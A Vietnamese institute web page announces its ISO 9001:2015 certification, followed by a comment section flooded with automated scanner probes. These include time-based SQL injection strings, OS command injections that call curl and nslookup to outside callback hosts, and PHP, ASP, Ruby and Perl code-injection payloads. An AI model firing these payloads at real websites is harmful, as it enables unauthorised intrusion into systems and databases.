Chi tiết bài viết

Image

Chứng nhận TCVN ISO 9001:2015

Tiêu chuẩn ISO 9001 nằm trong b tiêu chun ISO 9000 - Bộ tiêu chuẩn quốc tế được duy trì bởi tổ chức ISO, có mục tiêu trợ giúp các tổ chức xây dựng, áp dụng và vận hành hệ thống quản lý chất lượng có hiệu lực. Trong đó, ISO 9001 được xem là tiêu chuẩn trung tâm quan trọng nhất của bộ tiêu chuẩn ISO 9000.

ISO 9001 là một Tiêu chuẩn đưa ra các nguyên tắc, nguyên lý và yêu cầu để thiết lập được một hệ thống quản lý chất lượng trong doanh nghiệp và áp dụng cho tất cả các loại hình doanh nghiệp không phân biệt quy mô hay loạI hình sản xuất, kinh doanh hay dịch vụ.

ISO 9001 được xây dựng dựa trên kinh nghiệm thiết lập và vận hành hệ thống quản lý chất lượng của các chuyên gia và doanh nghiệp trong nhiều lĩnh vực sản xuất trên toàn thế giới.

ISO 9001 tập trung vào thiết lập một hệ thống quản lý để đảm bảo duy trì ổn định chất lượng sản phẩm/dịch vụ của doanh nghiệp, tiến tới nâng cao và cải tiến chất lượng sản phẩm/dịch vụ.

Sau thời gian thử nghiệm với ISO, Viện Sinh thái rừng và Môi trường đã thực hiện đánh giá nội bộ và đánh giá ngoài. Mọi hoạt động của Viện đều được ghi nhận làm đúng theo quy trình ISO mà Viện đã ban hành và nhận Chứng nhận TCVN ISO 9001:2015 vào ngày 06/9/2023.

 

Bình luận (113)

ncMUFCMU

21-12-2023 12:06:40

20

ncMUFCMU

21-12-2023 12:06:37

20

ncMUFCMU

21-12-2023 12:06:33

20

ncMUFCMU

21-12-2023 12:06:33

20

ncMUFCMU

21-12-2023 12:06:33

20

ncMUFCMU

21-12-2023 12:06:32

20

ncMUFCMU

21-12-2023 12:06:32

20

ncMUFCMU

21-12-2023 12:06:32

20

ncMUFCMU

21-12-2023 12:06:28

20

ncMUFCMU

21-12-2023 12:06:23

20

@@0SuiG

21-12-2023 12:06:19

20

1'"

21-12-2023 12:06:18

20

ncMUFCMU'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

21-12-2023 12:06:18

20

NhH9KcXk')) OR 676=(SELECT 676 FROM PG_SLEEP(15))--

21-12-2023 12:06:14

20

U6wUtsjD') OR 640=(SELECT 640 FROM PG_SLEEP(15))--

21-12-2023 12:06:10

20

6lkukr2Z' OR 469=(SELECT 469 FROM PG_SLEEP(15))--

21-12-2023 12:06:05

20

qM65W891')); waitfor delay '0:0:15' --

21-12-2023 12:06:00

20

SeMjLQ60'); waitfor delay '0:0:15' --

21-12-2023 12:05:56

20

byMwtJlO'; waitfor delay '0:0:15' --

21-12-2023 12:05:52

20

1 waitfor delay '0:0:15' --

21-12-2023 12:05:49

20

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

21-12-2023 12:05:45

20

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

21-12-2023 12:05:40

20

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

21-12-2023 12:05:35

20

if(now()=sysdate(),sleep(15),0)

21-12-2023 12:05:31

20

-1" OR 2+203-203-1=0+0+0+1 --

21-12-2023 12:05:26

20

-1' OR 2+246-246-1=0+0+0+1 or 'UE8W9Ems'='

21-12-2023 12:05:26

20

-1' OR 2+28-28-1=0+0+0+1 --

21-12-2023 12:05:26

20

-1 OR 2+353-353-1=0+0+0+1

21-12-2023 12:05:25

20

-1 OR 2+592-592-1=0+0+0+1 --

21-12-2023 12:05:25

20

wLQ79UFs

21-12-2023 12:05:25

20

ncMUFCMU

21-12-2023 12:05:21

20

ncMUFCMU

21-12-2023 12:05:17

20

ncMUFCMU

21-12-2023 12:05:06

;(nslookup -q=cname hitfvvomxpnrc7271b.bxss.me||curl hitfvvomxpnrc7271b.bxss.me)|(nslookup -q=cname hitfvvomxpnrc7271b.bxss.me||curl hitfvvomxpnrc7271b.bxss.me)&(nslookup -q=cname hitfvvomxpnrc7271b.bxss.me||curl hitfvvomxpnrc7271b.bxss.me)

ncMUFCMU

21-12-2023 12:05:06

`(nslookup -q=cname hitsbokxrudhrdf7a6.bxss.me||curl hitsbokxrudhrdf7a6.bxss.me)`

ncMUFCMU

21-12-2023 12:05:06

|(nslookup -q=cname hitamwjrqlayt40dee.bxss.me||curl hitamwjrqlayt40dee.bxss.me)

ncMUFCMU

21-12-2023 12:05:05

&(nslookup -q=cname hitrkaimskdqo3d173.bxss.me||curl hitrkaimskdqo3d173.bxss.me)&'\"`0&(nslookup -q=cname hitrkaimskdqo3d173.bxss.me||curl hitrkaimskdqo3d173.bxss.me)&`'

ncMUFCMU

21-12-2023 12:05:05

&nslookup -q=cname hitefwrpkjvgdcd778.bxss.me&'\"`0&nslookup -q=cname hitefwrpkjvgdcd778.bxss.me&`'

ncMUFCMU

21-12-2023 12:05:05

$(nslookup -q=cname hitbmtkbszfgwed0aa.bxss.me||curl hitbmtkbszfgwed0aa.bxss.me)

ncMUFCMU

21-12-2023 12:05:04

(nslookup -q=cname hitdcidurevrj95860.bxss.me||curl hitdcidurevrj95860.bxss.me))

ncMUFCMU

21-12-2023 12:05:04

20|echo xaeatv$()\ hnukyt\nz^xyu||a #' |echo xaeatv$()\ hnukyt\nz^xyu||a #|" |echo xaeatv$()\ hnukyt\nz^xyu||a #

ncMUFCMU

21-12-2023 12:05:04

|echo znlpcq$()\ vflyjz\nz^xyu||a #' |echo znlpcq$()\ vflyjz\nz^xyu||a #|" |echo znlpcq$()\ vflyjz\nz^xyu||a #

ncMUFCMU

21-12-2023 12:05:03

20&echo wplygj$()\ ywtjag\nz^xyu||a #' &echo wplygj$()\ ywtjag\nz^xyu||a #|" &echo wplygj$()\ ywtjag\nz^xyu||a #

ncMUFCMU

21-12-2023 12:05:03

&echo wgonil$()\ olypcm\nz^xyu||a #' &echo wgonil$()\ olypcm\nz^xyu||a #|" &echo wgonil$()\ olypcm\nz^xyu||a #

ncMUFCMU

21-12-2023 12:05:03

echo bztxiz$()\ lrhkdu\nz^xyu||a #' &echo bztxiz$()\ lrhkdu\nz^xyu||a #|" &echo bztxiz$()\ lrhkdu\nz^xyu||a #

ncMUFCMU

21-12-2023 12:05:03

20

ncMUFCMU

21-12-2023 12:05:02

20

ncMUFCMU

21-12-2023 12:05:02

20

ncMUFCMU

21-12-2023 12:05:02

20

ncMUFCMU

21-12-2023 12:05:01

20

ncMUFCMU

21-12-2023 12:05:01

20

ncMUFCMU

21-12-2023 12:05:01

20

ncMUFCMU

21-12-2023 12:05:01

20

ncMUFCMU

21-12-2023 12:05:00

20

ncMUFCMU

21-12-2023 12:05:00

20

ncMUFCMU

21-12-2023 12:05:00

20

ncMUFCMU

21-12-2023 12:04:59

20

;(nslookup -q=cname hitmoebelameb3f6c3.bxss.me||curl hitmoebelameb3f6c3.bxss.me)|(nslookup -q=cname hitmoebelameb3f6c3.bxss.me||curl hitmoebelameb3f6c3.bxss.me)&(nslookup -q=cname hitmoebelameb3f6c3.bxss.me||curl hitmoebelameb3f6c3.bxss.me)

21-12-2023 12:04:59

20

`(nslookup -q=cname hituobvgwiyid98511.bxss.me||curl hituobvgwiyid98511.bxss.me)`

21-12-2023 12:04:59

20

|(nslookup -q=cname hitwwcascdxra2a7bb.bxss.me||curl hitwwcascdxra2a7bb.bxss.me)

21-12-2023 12:04:58

20

&(nslookup -q=cname hitgohnwvpdil6b27e.bxss.me||curl hitgohnwvpdil6b27e.bxss.me)&'\"`0&(nslookup -q=cname hitgohnwvpdil6b27e.bxss.me||curl hitgohnwvpdil6b27e.bxss.me)&`'

21-12-2023 12:04:58

20

&nslookup -q=cname hitkawmwfpdkseb79e.bxss.me&'\"`0&nslookup -q=cname hitkawmwfpdkseb79e.bxss.me&`'

21-12-2023 12:04:58

20

$(nslookup -q=cname hitzubzfxtzpeaa15f.bxss.me||curl hitzubzfxtzpeaa15f.bxss.me)

21-12-2023 12:04:58

20

(nslookup -q=cname hitwcbmxgcoxm8c9f9.bxss.me||curl hitwcbmxgcoxm8c9f9.bxss.me))

21-12-2023 12:04:57

20

ncMUFCMU|echo kdogyw$()\ pdgtxz\nz^xyu||a #' |echo kdogyw$()\ pdgtxz\nz^xyu||a #|" |echo kdogyw$()\ pdgtxz\nz^xyu||a #

21-12-2023 12:04:57

20

|echo nfqgnf$()\ ygtmbj\nz^xyu||a #' |echo nfqgnf$()\ ygtmbj\nz^xyu||a #|" |echo nfqgnf$()\ ygtmbj\nz^xyu||a #

21-12-2023 12:04:57

20

ncMUFCMU&echo bbgcas$()\ cyalno\nz^xyu||a #' &echo bbgcas$()\ cyalno\nz^xyu||a #|" &echo bbgcas$()\ cyalno\nz^xyu||a #

21-12-2023 12:04:56

20

&echo qwqjca$()\ exjgfd\nz^xyu||a #' &echo qwqjca$()\ exjgfd\nz^xyu||a #|" &echo qwqjca$()\ exjgfd\nz^xyu||a #

21-12-2023 12:04:56

20

echo ziminy$()\ bwpfmi\nz^xyu||a #' &echo ziminy$()\ bwpfmi\nz^xyu||a #|" &echo ziminy$()\ bwpfmi\nz^xyu||a #

21-12-2023 12:04:56

20

ncMUFCMU

21-12-2023 12:04:55

"+response.write(9503182*9580766)+"

ncMUFCMU

21-12-2023 12:04:55

'+response.write(9503182*9580766)+'

ncMUFCMU

21-12-2023 12:04:55

response.write(9503182*9580766)

ncMUFCMU

21-12-2023 12:04:54

20

ncMUFCMU

21-12-2023 12:04:54

20

ncMUFCMU

21-12-2023 12:04:54

20

"+response.write(9013609*9172695)+"

21-12-2023 12:04:54

20

'+response.write(9013609*9172695)+'

21-12-2023 12:04:53

20

response.write(9013609*9172695)

21-12-2023 12:04:53

20

ncMUFCMU

21-12-2023 12:04:52

'+'a'.concat(70-3).concat(22*4).concat(100).concat(87).concat(100).concat(79)+(require'socket' socket.gethostbyname('hitlq'+'wiqgfikjdef5e.bxss.me.')[3].to_s)+'

ncMUFCMU

21-12-2023 12:04:52

"+"a".concat(70-3).concat(22*4).concat(117).concat(85).concat(97).concat(85)+(require"socket" socket.gethostbyname("hitmh"+"wdvmxhwme52a3.bxss.me.")[3].to_s)+"

ncMUFCMU

21-12-2023 12:04:51

20

ncMUFCMU

21-12-2023 12:04:51

20

'+'A'.concat(70-3).concat(22*4).concat(108).concat(71).concat(113).concat(68)+(require'socket' Socket.gethostbyname('hitji'+'drwnnyxt86352.bxss.me.')[3].to_s)+'

21-12-2023 12:04:51

20

"+"A".concat(70-3).concat(22*4).concat(108).concat(65).concat(122).concat(83)+(require"socket" Socket.gethostbyname("hityz"+"shsktgsf64649.bxss.me.")[3].to_s)+"

21-12-2023 12:04:50

20

ncMUFCMU

21-12-2023 12:04:21

".gethostbyname(lc("hitxi"."dqyvrxqkc45ff.bxss.me."))."a".chr(67).chr(hex("58")).chr(115).chr(85).chr(99).chr(74)."

ncMUFCMU

21-12-2023 12:04:21

'.gethostbyname(lc('hitpj'.'eskmaspp1656d.bxss.me.')).'a'.chr(67).chr(hex('58')).chr(105).chr(71).chr(113).chr(69).'

ncMUFCMU

21-12-2023 12:04:21

20

ncMUFCMU

21-12-2023 12:04:21

20

ncMUFCMU

21-12-2023 12:04:20

20

".gethostbyname(lc("hitzp"."dfghgghw9958f.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(78).chr(104).chr(72)."

21-12-2023 12:04:20

20

'.gethostbyname(lc('hitdt'.'hqfzqxred7a1c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(89).chr(117).chr(76).'

21-12-2023 12:04:20

20

ncMUFCMU

21-12-2023 12:04:19

'.print(md5(31337)).'

ncMUFCMU

21-12-2023 12:04:19

${@print(md5(31337))}\

ncMUFCMU

21-12-2023 12:04:19

${@print(md5(31337))}

ncMUFCMU

21-12-2023 12:04:18

";print(md5(31337));$a="

ncMUFCMU

21-12-2023 12:04:18

';print(md5(31337));$a='

ncMUFCMU

21-12-2023 12:04:18

;assert(base64_decode('chjpbnqobwq1kdmxmzm3ksk7'));

ncMUFCMU

21-12-2023 12:04:18

20

ncMUFCMU

21-12-2023 12:04:17

20

ncMUFCMU

21-12-2023 12:04:17

20

ncMUFCMU

21-12-2023 12:04:17

20

ncMUFCMU

21-12-2023 12:04:17

20

ncMUFCMU

21-12-2023 12:04:17

20

ncMUFCMU

21-12-2023 12:04:16

20

'.print(md5(31337)).'

21-12-2023 12:04:16

20

${@print(md5(31337))}\

21-12-2023 12:04:16

20

${@print(md5(31337))}

21-12-2023 12:04:15

20

";print(md5(31337));$a="

21-12-2023 12:04:15

20

';print(md5(31337));$a='

21-12-2023 12:04:15

20

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

21-12-2023 12:04:15

20

ncMUFCMU

21-12-2023 12:03:58

555

ncMUFCMU

21-12-2023 12:03:55

555

ncMUFCMU

21-12-2023 12:03:41

20

ncMUFCMU

21-12-2023 12:03:40

20

Viết bình luận

Image Image

Đăng ký nhận thông tin

Đăng ký để nhận các thông tin cập nhật mới nhất về các sản phẩm của chúng tôi

Image